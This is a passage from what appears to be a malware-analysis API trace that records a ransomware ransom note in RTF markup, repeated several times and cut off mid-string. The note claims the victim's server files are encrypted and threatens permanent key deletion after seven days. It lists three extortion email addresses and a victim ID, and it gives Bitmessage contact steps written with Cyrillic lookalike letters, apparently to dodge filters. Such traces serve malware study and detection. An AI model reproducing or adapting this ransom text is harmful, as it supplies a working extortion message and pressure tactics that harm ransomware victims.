COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 